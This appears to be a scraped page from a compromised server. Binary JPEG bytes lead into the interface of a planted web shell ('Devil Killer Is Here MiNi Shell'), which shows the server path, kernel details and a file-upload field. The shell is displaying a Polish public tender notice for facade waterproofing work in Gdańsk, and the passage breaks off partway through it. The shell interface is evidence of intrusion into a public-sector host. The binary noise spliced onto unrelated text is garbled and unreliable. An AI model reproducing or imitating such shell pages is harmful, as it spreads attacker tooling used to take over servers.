JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230913/0039425001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie hydrofobizacji elewacji ceglanej budynku przy ul. Augustyńskiego 2 w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191674836</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okopowa 21/27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 58 326 87 35</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pomorskie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pomorskie.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie hydrofobizacji elewacji ceglanej budynku przy ul. Augustyńskiego 2 w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8d3abee-520e-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00394250</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00041364/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Wykonanie hydrofobizacji elewacji ceglanej budynku przy ul. Augustyńskiego 2 w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pomorskie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1Postępowanie prowadzone jest w<br/>j.polskim,w formie elektronicznej,za pośrednictwem Platformy zakupowej<br/>2Komunikacja między Zamawiającym,a Wykonawcami,w tym wszelkie oświadczenia,wnioski,zawiadomienia oraz<br/>informacje,przekazywane winny być za pośrednictwem Platformy za pomocą formularza„Wyślij wiadomość do zamawiającego”<br/>3Za datę przekazania (wpływu) oświadczeń,wniosków,zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku„Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat,że wiadomość została wysłana do Zamawiającego<br/>4Zamawiający dopuszcza,awaryjnie,komunikację za pośrednictwem poczty elektronicznej<br/>Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zamowienia@pomorskie.eu (nie dotyczy składania<br/>ofert wraz z załącznikami).<br/>5Zamawiający będzie przekazywał Wykonawcom informacje elektronicznie za pośrednictwem Platformy.<br/>Informacje,zawiadomienia,zmiany,odpowiedzi-Zamawiający będzie zamieszczał na Platformie. Korespondencja,której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny Wykonawca,będzie przekazywana elektronicznie za pośrednictwem Platformy<br/>do konkretnego Wykonawcy, na adres mailowy wskazany w ofercie Wykonawcy.<br/>6Wykonawca, jako podmiot profesjonalny, ma obowiązek sprawdzania komunikatów i wiadomości przesłanych przez<br/>Zamawiającego, bezpośrednio na Platformie zakupowej oraz na poczcie elektronicznie–pod adresem wskazanym w ofercie,gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7Zamawiający wskazuje niezbędne wymagania techniczne umożliwiające pracę na Platformie zakupowej,tj.:<br/>1)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 256 kb/s;<br/>2)przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript,<br/>akceptująca pliki typu „cookies”.<br/>Ponadto Zamawiający informuję,że występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do<br/>ilości 10 plików lub spakowanych folderów (pliki można spakować programem do archiwizacji np. 7-Zip.) przy maksymalnej wielkości<br/>150 MB.<br/>8Wykonawca,przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej Platformy<br/>pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)zapoznał i stosuje się do aktualnej Instrukcji składania ofert/wniosków dostępnej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>9Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy zakupowej<br/>w szczególności za sytuację, gdy zamawiający zapozna się<br/>z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka<br/>oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu<br/>ponieważ nie został spełniony obowiązek narzucony w art.221 ustawy Pzp.<br/>10Zamawiający informuje,że instrukcje korzystania z Platformy zakupowej, dot.w szczególności logowania,składania wniosków o<br/>wyjaśnienie treści SWZ,składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. Pozostałe informacje zawarte na Platformie,a nie dotyczące technicznego z niej<br/>korzystania,nie są wiążące dla Wykonawców.<br/>11W zakresie kwestii nieuregulowanych niniejszą SWZ obowiązują przepisy ustawy Pzp oraz Rozporządzenia Prezesa Rady<br/>Ministrów z dn 30.12.2020r. w spr sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, informuję,<br/>że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Pomorskiego z siedzibą przy ul. Okopowej 21/27, 80-810 Gdańsk, tel. 58 326 87 58 adres e-mail: zamowienia@pomorskie.eu<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD): e-mail:<br/>iod@pomorskie.eu<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzieleniu zamówienia, prowadzenia<br/>dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z 11 września 2019 r. – Prawo zamówień publicznych;<br/>2) ustawa z 27 sierpnia 2009 r. o finansach publicznych;<br/>3) ustawa z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO<br/>– przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>5. Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy<br/>obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania<br/>na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem<br/>danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6.Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania oraz przez okres wynikający<br/>z przepisów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych, w szczególności zgodnie z art.78 ust.1 i 4 Pzp przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata – przez cały<br/>okres obowiązywania umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów, w których zostały zebrane, lub w inny sposób<br/>przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.<br/>8. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych ul. Stawki 2,<br/>00-913 Warszawa.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postępowaniu<br/>o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z PZP.<br/>12. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAZ-Z.272.76.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja zadania pn.: „Wykonanie hydrofobizacji elewacji ceglanej budynku przy ul.<br/>Augustyńskiego 2 w Gdańsku”.<br/>2. Zadanie wykonywane będzie na podstawie dokumentacji powykonawczej prac konserwatorsko-restauratorskich<br/>wykonanych w ramach zadania: „Rewitalizacja elewacji budynku z odbudową dwóch wież”, stanowiącej załącznik nr 8 do<br/>SWZ.<br/>3. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ.<br/>Zamawiający wymaga od Wykonawcy udzielenia gwarancji i rękojmi na wykonanie przedmiotu zamówienia na okres min. 60<br/>miesięcy.<br/>UWAGA: okres przedmiotowej gwarancji i rękojmi stanowi kryterium oceny ofert.<br/>4. Zamówienie należy zrealizować zgodnie z w.ymogami zawartymi: w Opisie Przedmiotu Zamówienia stanowiącym.<br/>załącznik nr 1 do SWZ oraz w projekcie umowy stanowiącym załącznik nr 2 do SWZ.<br/>5. Przedmiot zamówienia nie został podzielony na części, ponieważ taki podział skutkowałby nadmiernymi trudnościami<br/>technicznymi. W celu zachowania spójności całości zamówienia, pełen zakres prac musi wykonać jeden wykonawca.<br/>6. Zamawiający nie zastrzega możliwości ubiegania się o zamówienie wyłącznie przez Wykonawców, o których mowa w art.<br/>94 ustawy Pzp.<br/>7. Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej, o której mowa w art. 92 ustawy Pzp, tzn. oferty<br/>przewidującej odmienny sposób wykonania zamówienia niż określony<br/>w niniejszej SWZ.<br/>8. We wszystkich zapisach SWZ oraz jej załącznikach, w których Zmawiający, ze względu na brak możliwości opisania<br/>przedmiotu zamówienia w wystarczająco precyzyjny i zrozumiały sposób, odwołuje się do norm, ocen technicznych,<br/>specyfikacji technicznych lub systemów referencji technicznych, bądź wskazane są znaki towarowe, patenty, źródła<br/>pochodzenia lub szczególne procesy, które charakteryzują produkty lub usługi dostarczane przez konkretnego wykonawcę,<br/>zgodnie z art. 99 ust. 5 oraz art. 101 ust. 4 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/>9. W przypadku, gdy w dokumentach, które stanowią opis przedmiotu zamówienia podano nazwy materiałów, produktów<br/>konkretnych producentów to należy traktować to jedynie jako określenie pożądanego standardu i jakości. We wszystkich<br/>takich sytuacjach Wykonawca może zaoferować równoważne materiały, produkty o co najmniej takich samych parametrach<br/>technicznych oraz jakościowych. Przez równoważność produktu rozumie się zaoferowanie produktu, którego parametry<br/>techniczne zastosowanych materiałów, wydajność, trwałość oraz jakość jest nie gorsza od jakości produktów opisanych w<br/>SWZ.<br/>10. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego<br/>rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku, Wykonawca załącza do oferty wykaz<br/>rozwiązań równoważnych wraz z jego opisem lub normami.<br/>11. Zamawiający nie przewiduje zawarcia umowy ramowej i ustanowienia dynamicznego systemu zakupów oraz nie<br/>przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.<br/>12. Zamawiający nie przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>13. Zamawiający nie dopuszcza składania oferty w postaci katalogów elektronicznych ani dołączania katalogów<br/>elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp.<br/>14. Zamawiający nie przewiduje rozliczenia w walutach obcych. Rozliczenie zamówienia prowadzone jest w PLN.<br/>15. Podwykonawstwo:<br/>1) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom);<br/>2) w związku z realizacją zamówienia Zamawiający nie zastrzega obowiązku osobistego wykonania kluczowych zadań<br/>zamówienia,<br/>3) Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w<br/>ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (jeżeli są już znani) nazwy<br/>tych podwykonawców,<br/>4) powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte<br/>wykonanie zamówienia,<br/>5) Wykonawca może zmienić w trakcie trwania umowy podwykonawców w zakresie wskazanym w ofercie- zmiana taka nie<br/>może mieć wpływu na realizację umowy,<br/>6) w przypadku jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powołał<br/>się zgodnie z art. 118 ust. 1 Pzp w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany<br/>jest wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie<br/>mniejszym niż podwykonawca, na którego zasoby się powoływał w trakcie postępowania o udzielenie zamówienia,<br/>7) w przypadku braku płatności dla Podwykonawców Zamawiający zastrzega sobie prawo do wstrzymania zapłaty dla<br/>Wykonawcy do czasu uregulowania przez niego zobowiązań finansowych,<br/>8) Wykonawca zamierzający zawrzeć umowę z podwykonawcą, zgodnie z treścią art. 464 ust. 8 ustawy Pzp zobowiązany<br/>jest do przedłożenia Zamawiającemu zaparafowanego przez Wykonawcę i Podwykonawcę projektu tej umowy wraz ze<br/>wszystkimi załącznikami do niej. Postanowienie to stosuje się również do zmiany umowy z podwykonawcą (aneksu do<br/>umowy podwykonawczej).<br/>16. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>17. Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.<br/>18. Na podstawie art. 95 ust. 1 ustawy Pzp, Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na<br/>podstawie umowy o pracę, w rozumieniu ustawy z dnia 26 czerwca 1974 r Kodeks Pracy, osób wykonujących czynności<br/>związane z realizacją zamówienia, tj. osób wykonujących wszelkie roboty ogólnobudowlane, o których mowa w przedmiocie<br/>zamówienia, o ile, mieszczą się one w zakresie art. 22 § 1 Kodeksu Pracy, który brzmi: „Przez nawiązanie stosunku pracy<br/>pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz<br/>w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca – do zatrudniania pracownika za wynagrodzeniem”.<br/>19. Szczegółowe informacje nt. wymaganego zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku<br/>pracy, zostały opisane w Rozdziale IV SWZ.<br/>20. Zamawiający przewiduje również możliwość złożenia oferty po odbyciu przez Wykonawców wizji lokalnej, która<br/>rozpocznie się dnia 18.08.2023 r., o godz. 10:00, miejsce: od wejścia głównego od strony ul. Augustyńskiego 2, zbiórka przy<br/>portierze na parterze budynku. Udział Wykonawców w wizji lokalnej nie jest obowiązkowy.<br/>21. Wykonawca musi przewidzieć zabezpieczenie placu/terenu budowy, prace wykonywać zgodnie z przepisami<br/>dotyczącymi ochrony środowiska, ochrony przeciwpożarowej, ochrony własności publicznej i prywatnej, bezpieczeństwa i<br/>higieny pracy, stosować się do przepisów praw a, zapewnić właściwe materiały i normy związane z wykonaniem<br/>zamówienia, zapewnić kontrolę jakości robót oraz dokumentacji potrzebnej do odbioru robót.<br/>22. Wykonawca jest zobowiązany do analizy rozwiązań przedstawionych w dokumentacji SWZ, pod kątem przyjętych<br/>rozwiązań technicznych i optymalizacji systemu robót.<br/>23. Wykonawca nie może wykorzystać błędów lub opuszczeń występujących w dokumentacji SWZ, a o ich wykryciu winien<br/>natychmiast powiadomić Zamawiającego, który dokona odpowiednich zmian lub poprawek, w przypadku zaś zaniechania<br/>powyższego skutki z tym związane obciążać będą wyłącznie Wykonawcę.<br/>24. Wszelkie czasowe przerwy w dostawie mediów dopuszczalne są jedynie po każdorazowym, wcześniejszym uzgodnieniu<br/>z Zamawiającym terminu ich wyłączenia (energia elektryczna, woda, c.o. itp.), co najmniej, z dwudniowym wyprzedzeniem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <p class="mb-0">45452000-0 - Zewnętrzne czyszczenie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) 